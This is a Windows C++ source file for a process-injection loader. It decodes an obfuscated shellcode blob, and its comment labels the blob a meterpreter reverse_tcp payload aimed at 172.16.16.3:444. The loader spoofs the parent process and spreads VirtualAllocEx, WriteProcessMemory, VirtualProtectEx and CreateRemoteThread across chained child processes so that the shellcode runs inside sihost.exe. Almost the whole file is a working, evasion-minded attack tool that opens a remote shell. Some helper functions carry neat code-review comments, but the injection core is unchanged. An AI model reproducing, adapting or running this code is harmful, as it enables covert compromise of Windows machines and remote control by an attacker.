#include <windows.h> | |
#include <tlhelp32.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <iostream> | |
#include <stdarg.h> | |
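// Debug logger: formats `fmt` printf-style into a bounded local buffer and
// emits it on stdout (console builds) or via OutputDebugStringA (other builds).
// Output longer than sizeof msg - 1 characters is truncated; the buffer is
// always NUL-terminated. `fmt` must be a trusted format string, as with any
// printf-style API; the callers in this file pass literals.
void _dbg_printf(const char *fmt, ...)
{
    char msg[2048] = {};
    va_list args;
    va_start(args, fmt);
    // vsnprintf bounds the write; the previous _vsprintf_l call had no length
    // limit and could overrun `msg` on a long message.
    vsnprintf(msg, sizeof msg, fmt, args);
    va_end(args);
#ifdef _CONSOLE
    // Emit the already-formatted text as data. Passing it as the format string
    // (printf(msg)) would re-interpret any '%' sequences contained in the message.
    fputs(msg, stdout);
    fputc('\n', stdout);
#else
    OutputDebugStringA(msg);
#endif
}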
#ifdef _DEBUG | |
#define PRINTF(fmt, ...) _dbg_printf(fmt, __VA_ARGS__) | |
#else | |
#define PRINTF(...) | |
#endif | |
// Globals placed in a custom section named "shared". The linker directive
// below marks that section Read/Write/Shared (RWS); a writable shared data
// section is an unusual PE characteristic and is visible in the image's
// section table.
#pragma bss_seg("shared")
int buffer;
PVOID sharedRemoteBuffer;
HANDLE remoteProcessHandle;
HANDLE remoteProcessHandleDup;
#pragma bss_seg()
#pragma comment(linker, "/section:shared,RWS")
// Attaches this process to a console. The parent's console is tried first,
// then the console associated with this process id. ERROR_ACCESS_DENIED from
// AttachConsole is treated as "already attached" and counts as success.
// Returns false only when the second attempt fails with some other error.
bool bAttachToConsole()
{
    if (AttachConsole(ATTACH_PARENT_PROCESS))
        return true;
    if (GetLastError() == ERROR_ACCESS_DENIED)
        return true;                       // already has a console

    // Fall back to our own process id, applying the same "already attached" rule.
    if (AttachConsole(GetCurrentProcessId()))
        return true;
    return GetLastError() == ERROR_ACCESS_DENIED;
}
static void* DecodeShellcode(__out SIZE_T *size) | |
{ | |
//encoded shellcode here / windows/meterpreter/reverse_tcp lport 444 lhost 172.16.16.3 | |
unsigned char shellcode[] = "\x84\x27\x56\xd9\x84\xd6\xe8\x79\x29\x87\x4e\x3e\xae\x92\x6c\xd6\xce\x43\x33\xd7\xcf\x43\xeb\x21\xd7\x89\xae\xd6\x1e\x2a\x57\xff\xd6\x8f\x47\xfe\x56\x8e\x55\xff\xd6\x00\x86\x16\xd9\x77\xa4\x59\x56\x4f\x84\x51\x81\xe6\x20\xf7\xd2\x20\xb3\x0b\x6c\x79\x29\xaf\x64\x16\xa4\xd8\x46\x70\x0f\xdd\x84\x92\xa7\xe3\x26\x75\x20\xf6\x04\x3d\xa7\xe3\x26\x7d\x20\x66\xb8\x77\xe7\x3b\x4a\x40\x20\xf6\x00\x34\xa7\xb4\x74\xec\xae\xab\xc1\x7e\x2b\x96\x44\x41\x10\x26\x66\x1e\x96\xce\xd1\x33\x01\xad\x47\x4f\xe4\x96\x1d\x31\xae\x8e\x6e\x24\x62\xa2\x63\x7a\x48\xc7\xaf\x8e\xe0\x92\x6c\x79\x58\x97\x5f\x3e\xae\x92\x65\xc9\x31\x09\xa2\x37\x8e\x88\x1d\x70\x2a\x0f\x3f\x36\xaa\x98\x45\x59\x33\xfb\x84\x37\x51\xab\xc5\x5f\x10\xaf\x3f\xb8\xbf\x9b\x4c\xa3\x20\xa1\x56\xab\x86\xaa\x55\xd8\x01\xa7\x76\x39\xb2\x3c\x52\xf0\x49\x0e\xca\x3f\x06\xb5\x56\xd7\x32\x8c\xc6\x4f\xa6\x16\x45\x59\x33\x4b\x66\x4f\x2f\x9b\xe4\x08\x21\x04\x67\x1e\xb4\xba\x1d\xf9\x38\x8e\x6e\x24\x86\x99\x44\x72\xe2\xac\x05\x16\xa5\xba\x47\x51\x62\x8e\x3e\xa3\xaa\xba\x26\x86\x35\x8c\x66\x15\xe5\x9b\x1d\x3b\x14\xee\xb1\xc1\x51\x39\x65\x5f\x52\xed\x67\xe9\x40\xbf\xa1\x74\xa7\x09\x40\x3e\x86\x58\x65\x48\x15\xae\xb6\x66\x27\x7c\xa8\x99\xd6\x3d\x24\x17\x79\xfe\x22\x56\x27\x09\x28\x78\xae\xba\xa6\x70\x18\xbb\x67\xc6\xf6\x1b\x82\xbd\xc9\x78\xf4\x54\xc4\x9b\x5d\x45\x43\xcc\xe7\x18\xb6\x3b\x4a\x40\x43\xed\x67\x69\x2e\x71\xdf\x0e\x29\x87\x4e\x3e\x51\x28\x45\x48\xb1\x9a\x8c\x3e\xae\x92\x00\x79\x6f\x87\x8b\x3e\x00\x92\xa0\x79\x2f\x87\x8b\x3e\x43\x92\x22\x79\xc5\x87\x4e\x3e\xe5\x9b\x5d\x41\x00\x7f\x56\x49\x8e\x92\x6c\xd0\x0f\xbe\x67\x69\x66\xe1\xaf\x21\x29\x87\x4e\x3e\x51\x28\x71\xe6\x29\x87\x4e\x33\xae\x1c\x6c\xf7\x29\x89\x4e\x50\xae\xd5\x6c\x9c\x29\x62\x4e\x52\xae\xd4\x6c\xbc\x29\x29\x4e\xf2\xae\x94\x6c\xbc\x29\x6a\x4e\x70\xae\x7e\x6c\x9c\x29\x6f\x4e\x56\xae\xfa\x6c\x91\x29\x81\x4e\x56\xae\xdb\x6c\x15\x29\x80\x4e\xd7\xae\x5a\x6c\x91\x29\xef\x4e\x96\xae\xfe\x6c\x10\x29\xce\x4e\x93\xae\x1c\x6c\xb5\x29\xc9\x4e\xd0\xae\xde\x6
c\x70\x29\xad\x4e\x11\xae\x34\x6c\x13\x29\xe1\x4e\x14\xae\x14\x6c\x7f\x29\xaa\x4e\xd6\xae\x95\x6c\x53\x29\xcc\x4e\x96\xae\xb8\x6c\x15\x29\xa0\x4e\x11\xae\xdc\x6c\x93\x29\xac\x4e\xd7\xae\x1b\x6c\x7f\x29\x61\x4e\x72\xae\x9d\x6c\xb7\x29\xcd\x4e\xf6\xae\x37\x6c\x74\x29\xea\x4e\xd6\xae\x99\x6c\xb7\x29\x8c\x4e\x50\xae\x98\x6c\x7e\x29\x2f\x4e\x93\xae\x3a\x6c\xb4\x29\x0f\x4e\x18\xae\xd9\x6c\x76\x29\x69\x4e\xf0\xae\xfa\x6c\x92\x29\x29\x4e\x34\xae\xda\x6c\x7e\x29\xe9\x4e\x10\xae\x5a\x6c\xff\x29\x61\x4e\x38\xae\xbe\x6c\x52\x29\x6c\x4e\x30\xae\xb8\x6c\xbf\x29\xc1\x4e\xb8\xae\xb9\x6c\x91\x29\xef\x4e\x10\xae\xfc\x6c\xbf\x29\x0e\x4e\x71\xae\xbf\x6c\x72\x29\x0f\x4e\x14\xae\x92\x6c\x70\x18\xbf\x24\x75\x86\x99\xc5\x48\x91\xae\x3e\x26\x2a\x3b\x4a\x40\x43\x8e\xb6\x26\xae\xb2\x7c\x79\x23\xed\x24\x17\x56\xca\x7f\x7b\x5f\xec\xb1\x84\xa7\xa3\xb4\x70\x59\x9a\x4a\x37\x9f\x6e\x65\x48\x16\xae\xb6\x66\x8a\x66\x0d\x75\xd6\x3d\xfe\x26\x4f\x02\xc1\x79\x29\x87\x47\x4f\x46\x93\xdc\x61\xa7\xc0\x47\x0f\x95\x9b\x93\x41\x20\xbf\x72\x3a\x84\xf8\x66\x70\x3e\xe7\x4e\x3e\xae\xf2\x6c\x79\x29\x8d\x67\x0f\xb2\x9b\x1c\xe4\x2d\x8e\x7f\xc2\x87\xa3\x53\xf0\x18\xbb\xc7\x0f\xf3\xbb\x94\x21\x72\x3c\x13\x17\x51\x28\xdc\x61\xa7\x22\x33\x7c\xa7\xe3\x84\x7b\x99\x9f\xc0\x5a\xa7\xe2\x94\x78\x64\xe7\x45\x37\x9f\x72\x45\x48\x36\xca\x4d\x16\x85\x9b\x5d\x47\x64\x43\x05\x17\xf9\xe8\x67\xca\xf0\x87\x4e\x3e\xae\x6d\xd6\x34\x68\x6c\x47\x0f\x90\xdf\x8f\x32\x63\x8a\x4e\x58\xae\x92\x45\x48\x35\xca\xce\x16\x85\xbb\x3b\x03\x22\x34\x97\x3e\xae\x92\x6c\x86\x93\x2e\x68\x26\xc4\xd9\x65\x48\x17\x2e\x68\x07\xc4\xf8\x06\x13\x00\xd0\xfc\x35\xd9\xa0\x6c\x79\x29\x87\xb1\x84\x1e\x8a\xc2\xf8\x20\x78\xb7\xb0\xee\xef\x1b\x64\xf2\x87\x4e\x3e\xa7\xa3\x52\x13\x62\xae\xb6\x66\x0e\x83\xdf\x77\xd6\x3d\xfe\x26\x20\xaf\x65\x48\x17\xca\x87\x75\x87\xa3\x70\xd0\x18\x5f\x24\x73\xaf\xbb\x5d\x45\x00\x7f\x16\x31\x2e\x77\x88\x86\x93\x37\x56\xb0\xf7\xbb\x1d\xb8\x64\x84\x67\x0f\x92\xbb\x5d\x85\x00\xe2\x6a\x17\x9f\x8e\xc5\x48\xf1\xca\x2e\x75\x87\xc5\xc9\xb4\x1c\xff\x4
e\x3e\xae\x92\x93\xc3\x99\x9f\xaf\xae\x5d\x6d\x93\x86\x34\x05\x4e\x3e\xae\x3c\x60\x35\xa9\xdd\x80\x45\x6f\xd5\x07\x93\x89\xaf\x51\x46\x7c\x8f\x60\x38\x65\x8c\x47\xec\x27\xa3\x92\x50\x58\x66\x30\xea\x4f\x22\xc2\x86\xd6\x78\x47\xec\xc4\xb9\x21\x71\x62\xae\x7f\x04\x96\xce\x6e\x50\xd1\x9f\x4e\x3c\xae\x92\x45\x2e\x22\x13\x24\x82\xae\x92\x6c\x79\xd6\x3d\x47\x4c\xc4\xf8\x65\x48\xd5\x8e\x7f\x00\xa7\xa3\x37\x50\xd1\x9f\x4e\x3a\xae\x92\x45\x48\x16\xae\xb6\x66\x23\xb7\xe8\xb6\xd6\x3d\x47\x4e\x36\x96\xdc\x61\xc8\x17\x6b\xc1\x51\x6d\xa0\x08\xc9\x8e\x6e\x46\x1e\x8a\xc2\x43\x22\xff\x45\x73\xae\xb9\x1b\x65\x8a\xc2\x0f\x16\x9f\xc9\x93\xc3\x41\x55\xa7\x76\x62\xe4\x25"; | |
void *r = malloc(sizeof(shellcode)); | |
char *ptr = (char *) r; | |
for(int i = 0; i < sizeof(shellcode); i++) { | |
ptr[i] = ~((shellcode[i] << 3) | (shellcode[i] >> (8 - 3))); //ror | |
} | |
//printf("Length: %d\n", sizeof(shellcode)); | |
//for (int i = 0; i < sizeof shellcode-1; i++) { | |
// printf("\\x%02x", shellcode[i]); | |
//} | |
*size = sizeof(shellcode); | |
return r; | |
} | |
bool CreateProcessWithParent(DWORD parentId, PWCHAR arg) { | |
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, parentId); | |
if (!hProcess) | |
return false; | |
SIZE_T size; | |
::InitializeProcThreadAttributeList(nullptr, 1, 0, &size); | |
auto buffer = std::make_unique<BYTE[]>(size); | |
auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get()); | |
::InitializeProcThreadAttributeList(attributes, 1, 0, &size); | |
::UpdateProcThreadAttribute(attributes, 0, | |
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, | |
&hProcess, sizeof(hProcess), nullptr, nullptr); | |
STARTUPINFOEX si = { sizeof(si) }; | |
si.lpAttributeList = attributes; | |
PROCESS_INFORMATION pi; | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
::SetHandleInformation(remoteProcessHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT); | |
WCHAR AppName[] = L".\\RemoteThreadInject.exe"; | |
WCHAR cmdline[100]; | |
WCHAR base[] = L".\\RemoteThreadInject.exe %ws"; | |
swprintf_s(cmdline, base, arg); | |
BOOL created = ::CreateProcess(AppName, cmdline, 0, 0, TRUE, EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED, 0, 0, (STARTUPINFO*)&si, &pi); | |
HANDLE localProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pi.dwProcessId); | |
DuplicateHandle(GetCurrentProcess(),remoteProcessHandle,localProc,&remoteProcessHandleDup,0,TRUE,DUPLICATE_SAME_ACCESS); | |
DuplicateHandle(localProc, remoteProcessHandleDup, localProc, &remoteProcessHandle, 0, TRUE, DUPLICATE_SAME_ACCESS); | |
ResumeThread(pi.hThread); | |
PRINTF("%ws - %ws", AppName, cmdline); | |
::CloseHandle(hProcess); | |
::DeleteProcThreadAttributeList(attributes); | |
return created; | |
} | |
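// Returns the PID of the first running process whose image name equals
// `lpProcessName` (case-insensitive compare), or 0 when no process matches,
// `lpProcessName` is NULL, or the Toolhelp snapshot cannot be taken/read.
// The snapshot handle is released on every path.
DWORD FindProcByName(LPCWSTR lpProcessName)
{
    if (lpProcessName == NULL)
        return 0;                          // _wcsicmp on NULL is undefined

    HANDLE hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        PRINTF("Failed to create snapshot. LastError %d", GetLastError());
        return 0;
    }
    PROCESSENTRY32 pe = {};
    pe.dwSize = sizeof(pe);                // Toolhelp requires dwSize before the first call
    if (!::Process32First(hSnapshot, &pe)) {
        PRINTF("Process32First failed. LastError %d", GetLastError());
        CloseHandle(hSnapshot);            // this error path previously leaked the snapshot
        return 0;
    }
    DWORD dwPid = 0;
    do {
        if (_wcsicmp(lpProcessName, pe.szExeFile) == 0) {
            dwPid = pe.th32ProcessID;
            PRINTF("[*] Target PID = %d", dwPid);
        }
    } while (::Process32Next(hSnapshot, &pe) && dwPid == 0);
    CloseHandle(hSnapshot);
    return dwPid;
}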
// Step tokens indexed by step number (0 = none). NOTE(review): entry 2 reads
// "WPA" while parseArgs1 and wmain use the token "WPM"; this table is not
// referenced anywhere in this listing, so the mismatch has no runtime effect here.
const char *args[] = {
"",
"VA",
"WPA",
"VP",
"CRT"
};
// Maps a step token to its step number: "VA" -> 1, "WPM" -> 2, "VP" -> 3,
// "CRT" -> 4. Returns 0 for NULL or any unrecognised token (compare is
// case-sensitive).
int parseArgs1(const wchar_t *arg)
{
    // Tokens in step order; the index plus one is the step number.
    static const wchar_t *const kSteps[] = { L"VA", L"WPM", L"VP", L"CRT" };
    const int kStepCount = (int)(sizeof kSteps / sizeof kSteps[0]);

    if (arg == NULL)
        return 0;
    for (int idx = 0; idx < kStepCount; idx++) {
        if (wcscmp(arg, kSteps[idx]) == 0)
            return idx + 1;
    }
    return 0;
}
int wmain(int argc, wchar_t *argv[]) | |
{ | |
PRINTF("[*] ...Running Main\n"); | |
STARTUPINFOA si; | |
si = {}; | |
PROCESS_INFORMATION child = {}; | |
int targetPid; | |
DWORD fakePPIDPid = 0; | |
DWORD returnLength = 0; | |
WCHAR fakePPID[] = L"sihost.exe"; | |
WCHAR target[] = L"sihost.exe"; | |
BOOL result = TRUE; | |
int c = 0; | |
if (argc > 1) | |
c = parseArgs1(argv[1]); | |
SIZE_T size = 0; | |
void* shellcode = DecodeShellcode(&size); | |
SIZE_T mem_size = ((size % 4096) == 0) ? size : (size / 4096) + 4096; | |
DWORD old = 0; | |
char targetImage[MAX_PATH] = {}; | |
const char* base = ".\\RemoteThreadInject.exe %s"; | |
const char* prefix = "null"; | |
fakePPIDPid = FindProcByName(fakePPID); | |
HANDLE remoteThread = NULL; | |
switch(c) { | |
case 0:{ | |
PRINTF("[*] Step 0 - Process PID is: %d\n", GetCurrentProcessId()); | |
targetPid = FindProcByName(target); | |
PRINTF("%d target image\n", targetPid); | |
remoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, targetPid); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
if (remoteProcessHandle == NULL) { | |
PRINTF("Cannot open processs. LastError %d\n", GetLastError()); | |
return 1; | |
} | |
WCHAR prefix_new[] = L"VA"; | |
PRINTF("%s target image\n", targetImage); | |
CreateProcessWithParent(fakePPIDPid, prefix_new); | |
ExitProcess(0); | |
break; | |
} | |
case 1: { | |
PRINTF("[*] Step 1 - Current PID is: %d\n", GetCurrentProcessId()); | |
PRINTF("\t[*] Executing Virtual Alloc"); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
sharedRemoteBuffer = VirtualAllocEx(remoteProcessHandle, NULL, mem_size, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE); | |
PRINTF("\t[*] shared buffer at: 0x%x\n", sharedRemoteBuffer); | |
if (sharedRemoteBuffer == NULL) { | |
PRINTF("Cannot allocate memory on remote process. LastError %d", GetLastError()); | |
return 1; | |
} | |
WCHAR prefix_new[] = L"WPM"; | |
CreateProcessWithParent(fakePPIDPid, prefix_new); | |
ExitProcess(0); | |
break; } | |
case 2: { | |
PRINTF("[*] Step 2 - Current PID is: %d", GetCurrentProcessId()); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
PRINTF("\t[*] Executing Write Process Memory"); | |
if (WriteProcessMemory(remoteProcessHandle, sharedRemoteBuffer, shellcode, size, NULL) == FALSE) { | |
PRINTF("Error using WriteProcessMemory. LastError %d", GetLastError()); | |
return 1; | |
} | |
memset(shellcode, 0, size); | |
free(shellcode); | |
WCHAR prefix_new[] = L"VP"; | |
CreateProcessWithParent(fakePPIDPid, prefix_new); | |
ExitProcess(0); | |
break; } | |
case 3: { | |
PRINTF("[*] Step 3 - Current PID is: %d", GetCurrentProcessId()); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle); | |
PRINTF("\t[*] Executing Virtual Protect"); | |
if (VirtualProtectEx(remoteProcessHandle, sharedRemoteBuffer, mem_size, PAGE_EXECUTE_READWRITE, &old) == FALSE) { | |
PRINTF("Error on VirtualProtectEx. LastError %d", GetLastError()); | |
return 1; | |
} | |
WCHAR prefix_new[] = L"CRT"; | |
CreateProcessWithParent(fakePPIDPid, prefix_new); | |
ExitProcess(0); } | |
case 4: { | |
PRINTF("[*] Step 4 - Current PID is: %d", GetCurrentProcessId()); | |
PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandleDup); | |
PRINTF("\t[*] Executing Create Remote Thread"); | |
remoteThread = CreateRemoteThread(remoteProcessHandleDup, NULL, 0, (LPTHREAD_START_ROUTINE)sharedRemoteBuffer, NULL, 0, NULL); | |
if (remoteThread == NULL) { | |
PRINTF("Cannot Create Thread on remote process. LastError %d", GetLastError()); | |
return 1; | |
} | |
WaitForSingleObject(remoteThread, INFINITE); | |
PRINTF("[*] - Exiting"); | |
ExitProcess(0); | |
break; } | |
} | |
ResumeThread(child.hThread); | |
WaitForSingleObject(child.hProcess, INFINITE); | |
CloseHandle(child.hThread); | |
CloseHandle(child.hProcess); | |
remoteProcessHandle = NULL; | |
if (remoteProcessHandle != NULL) { | |
CloseHandle(remoteProcessHandle); | |
} | |
return 0; | |
} | |
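// GUI-subsystem entry point: splits the process command line into argv form,
// logs each argument, and delegates to wmain. Returns wmain's exit code, or 0
// when the command line could not be parsed. The argv block returned by
// CommandLineToArgvW is released with LocalFree, as that API requires.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
    PRINTF("[*] ...Running WinMain\n");
    int nArgs = 0;
    LPWSTR *szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);
    if (szArglist == NULL) {
        PRINTF("CommandLineToArgvW failed\n");
        return 0;
    }
    for (int i = 0; i < nArgs; i++) {
        PRINTF("%d: %ws", i, szArglist[i]);
    }
    // The previous version fell off the end without returning a value, which is
    // undefined behaviour for a non-void function; propagate wmain's result.
    int rc = wmain(nArgs, szArglist);
    LocalFree(szArglist);
    return rc;
}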